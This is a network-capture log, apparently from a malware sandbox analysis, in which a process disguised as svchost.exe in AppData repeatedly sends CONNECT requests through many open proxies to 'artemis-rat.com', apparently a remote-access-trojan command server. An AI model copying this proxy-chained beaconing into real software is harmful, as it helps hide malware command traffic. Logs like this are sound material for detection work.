Mar 9, 2024 13:14:29.409230947 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2220	192.168.2.5	57048	34.49.208.221	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.265149117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2221	192.168.2.5	56963	89.218.8.152	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.265636921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2222	192.168.2.5	56991	113.208.119.142	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.266597986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.638181925 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2223	192.168.2.5	57080	104.21.124.121	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.278389931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.432972908 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2224	192.168.2.5	56937	60.12.168.114	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.281991959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.714255095 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:53:03 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2225	192.168.2.5	55885	130.255.162.199	44234	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.299019098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.177000046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2226	192.168.2.5	56434	117.160.250.131	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.300251007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.177531958 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2227	192.168.2.5	57101	104.27.15.161	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.302311897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.459590912 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2228	192.168.2.5	57003	65.1.244.232	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.302438974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.697105885 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:29 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:29.702832937 CET	209	OUT	Data Raw: 16 03 03 00 cc 01 00 00 c8 03 03 65 ec 52 a4 f5 53 57 58 23 d2 9d b5 ea 27 8d 88 24 9c ca 2c f3 d1 07 45 c8 18 84 78 6d ea fb 64 20 13 23 14 2e be e6 8a f7 90 cb 10 59 86 ea 5b 3c 65 8e 34 56 33 4a 4b 0d 6c 62 54 54 be 97 bc 72 00 2a c0 2c c0 2b Data Ascii: eRSWX#'$,Exmd #.Y[<e4V3JKlbTTr*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:30.098526001 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 58 21 79 ef b4 f8 b2 46 43 ce 97 ba ba d4 32 55 ba 3c 00 8f 65 d9 3f 23 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9X!yFC2U<e?#DOWNGRD0000H010Uartemis-rat.com0240309113427Z260309113427Z010Uartemis-rat.com0"0H0j/]HB
Mar 9, 2024 13:14:30.105036020 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 92 f5 d6 51 1c 5f 0d 8d 96 54 30 ff 0f dd a9 3a e5 f9 93 c4 46 56 08 72 bc e9 24 72 00 83 e8 22 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 af 1a bc 35 f4 e6 00 67 cd 65 37 59 49 2d 1b d3 70 28 5c 34 79 Data Ascii: %! Q_T0:FVr$r"(5ge7YI-p(\4y~J?qs
Mar 9, 2024 13:14:30.496149063 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 d4 de ec d3 e2 a4 27 06 09 8d 63 17 13 00 a4 d2 ea 66 26 97 7f 13 d0 c3 6c f7 a6 a8 21 0b 65 2a 44 c2 0a 4b a4 48 96 91 Data Ascii: ('cf&l!e*DKH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2229	192.168.2.5	56133	154.12.178.107	29985	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.302723885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2230	192.168.2.5	57022	43.163.192.3	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.329490900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2231	192.168.2.5	56019	82.113.157.122	31280	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.336658955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2232	192.168.2.5	56949	124.163.236.54	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.336843014 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:29.806246042 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2233	192.168.2.5	57129	64.227.106.157	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.339267969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.512599945 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2234	192.168.2.5	57064	209.97.150.167	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.340404987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2235	192.168.2.5	57077	162.243.102.207	9764	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.341787100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2236	192.168.2.5	56791	117.160.250.163	81	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.343435049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.026624918 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:29 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.
Mar 9, 2024 13:14:32.840718985 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:29 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2237	192.168.2.5	57018	128.140.26.12	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.350842953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.659248114 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.25.2 Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2238	192.168.2.5	56525	42.61.48.219	8000	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.352118969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.182699919 CET	263	IN	HTTP/1.1 503 Service Unavailable x-envoy-overloaded: true content-length: 81 content-type: text/plain date: Sat, 09 Mar 2024 11:54:18 GMT server: svcproxy connection: close Data Raw: 75 70 73 74 72 65 61 6d 20 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 20 6f 72 20 64 69 73 63 6f 6e 6e 65 63 74 2f 72 65 73 65 74 20 62 65 66 6f 72 65 20 68 65 61 64 65 72 73 2e 20 72 65 73 65 74 20 72 65 61 73 6f 6e 3a 20 6f 76 65 72 66 6c 6f 77 Data Ascii: upstream connect error or disconnect/reset before headers. reset reason: overflow

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2239	192.168.2.5	57134	92.204.134.38	15393	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.358457088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2240	192.168.2.5	57151	142.4.123.41	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.359847069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2241	192.168.2.5	57015	43.131.242.162	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.365353107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2242	192.168.2.5	56050	54.36.122.16	29796	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.387819052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.146048069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2243	192.168.2.5	57017	193.239.58.92	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.387820005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2244	192.168.2.5	57125	98.6.197.202	16099	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.393949032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.942727089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.646572113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.942965031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.536746979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.385565042 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2245	192.168.2.5	57013	49.4.48.128	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.394650936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2246	192.168.2.5	56147	92.204.134.38	25825	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.394700050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.646027088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
